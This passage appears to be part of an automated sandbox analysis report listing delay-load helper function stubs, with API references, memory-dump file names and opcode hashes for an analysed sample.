                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: 3520068143103f5973d417e32a4201db76a38446b3dee49e71c2c3e43655df89
                                                                                  • Instruction ID: c262b8822c431675bce1b5157e538fb2f73af0e965a1d8d95b5c09d0568b1c2e
                                                                                  • Opcode Fuzzy Hash: 3520068143103f5973d417e32a4201db76a38446b3dee49e71c2c3e43655df89
                                                                                  • Instruction Fuzzy Hash: E9B092CA27A101BD3544A2549C03C3A011DC0C2B11332422AB408C11C0A8804C700E32
                                                                                  Function 0028E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: fa9e515a3e25e9ad3c87563f6e62a0de3b0f0131c54b3ccb1279505f29b77647
                                                                                  • Instruction ID: a0fdb628c27ad998c2b517e73d678daf112d38a17fc9214ecbf97a1198b00c0f
                                                                                  • Opcode Fuzzy Hash: fa9e515a3e25e9ad3c87563f6e62a0de3b0f0131c54b3ccb1279505f29b77647
                                                                                  • Instruction Fuzzy Hash: D9B0928A27A0027E3504A2545C02C3A010DC4C2B10332402EF408C11C0A8804C300E32
                                                                                  Function 0028E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 0c4d93a91b7a893c33cd36f8495377244db5f579f028189a479efbd8d8b07ee6
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 0c4d93a91b7a893c33cd36f8495377244db5f579f028189a479efbd8d8b07ee6
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 2412be0bdfa44499cbc8c9885743573757304eb172480e1edc61b0aa44381183
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 2412be0bdfa44499cbc8c9885743573757304eb172480e1edc61b0aa44381183
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 6e8c1584c3f8d3c00bcf578e8aa229fa9194b7953af546250e9c3c44b38502a3
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 6e8c1584c3f8d3c00bcf578e8aa229fa9194b7953af546250e9c3c44b38502a3
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: aa95da2f74912b28a25b3a7f0422950457fe66953c79864244bd29003aa20ac4
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: aa95da2f74912b28a25b3a7f0422950457fe66953c79864244bd29003aa20ac4
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 3ab710ac5c7ea255926e7c94d8260eb1bf1c6fec9b30d1f40b1fe78fc0275087
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 3ab710ac5c7ea255926e7c94d8260eb1bf1c6fec9b30d1f40b1fe78fc0275087
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: f43e87213e5a3b406e842c1dcae4c3c3190a60f73a9e780ff3333aedf5ae4005
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: f43e87213e5a3b406e842c1dcae4c3c3190a60f73a9e780ff3333aedf5ae4005
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 1159f8cbaee36cabb2b6316ee96c987bdf483317a40a2399390837aa7f27bd8c
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 1159f8cbaee36cabb2b6316ee96c987bdf483317a40a2399390837aa7f27bd8c
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 5f6b9217b83f92ea13d4e97396f247c233dcb80054472196cb26beed111f68f4
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 5f6b9217b83f92ea13d4e97396f247c233dcb80054472196cb26beed111f68f4
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 5fd3d5778933096c7e313ba38098cc2a5f248aad7a048b7c75a37aa77778d575
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 5fd3d5778933096c7e313ba38098cc2a5f248aad7a048b7c75a37aa77778d575
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 97c7d3d6a6c2a6edfbe4ea32b2d457271a8d564070a19c419d409e1e72e14654
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 97c7d3d6a6c2a6edfbe4ea32b2d457271a8d564070a19c419d409e1e72e14654
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  Function 0028E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 4379e5166d81d37a599c64fc968ce3f8ab885a3a58407b9e561d13dbbba83e65
                                                                                  • Instruction ID: 760f78669b28f3df8b41872cc45d8e9709894b0c2b1658c235231c2fb28d46c4
                                                                                  • Opcode Fuzzy Hash: 4379e5166d81d37a599c64fc968ce3f8ab885a3a58407b9e561d13dbbba83e65
                                                                                  • Instruction Fuzzy Hash: 4DA011CA2BA002BC3808B2002C02C3F020EC0C3F203B2882EF802800C0AC800C200E30
                                                                                  Function 0028E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: 7b4200bc061f85fbd04286b0e395a78e87fc9944be4e656ed46d31628916fa75
                                                                                  • Instruction ID: c2e5e9eab085493193875e14af98a2389da24dbd3742eda6d8c4182419f8181f
                                                                                  • Opcode Fuzzy Hash: 7b4200bc061f85fbd04286b0e395a78e87fc9944be4e656ed46d31628916fa75
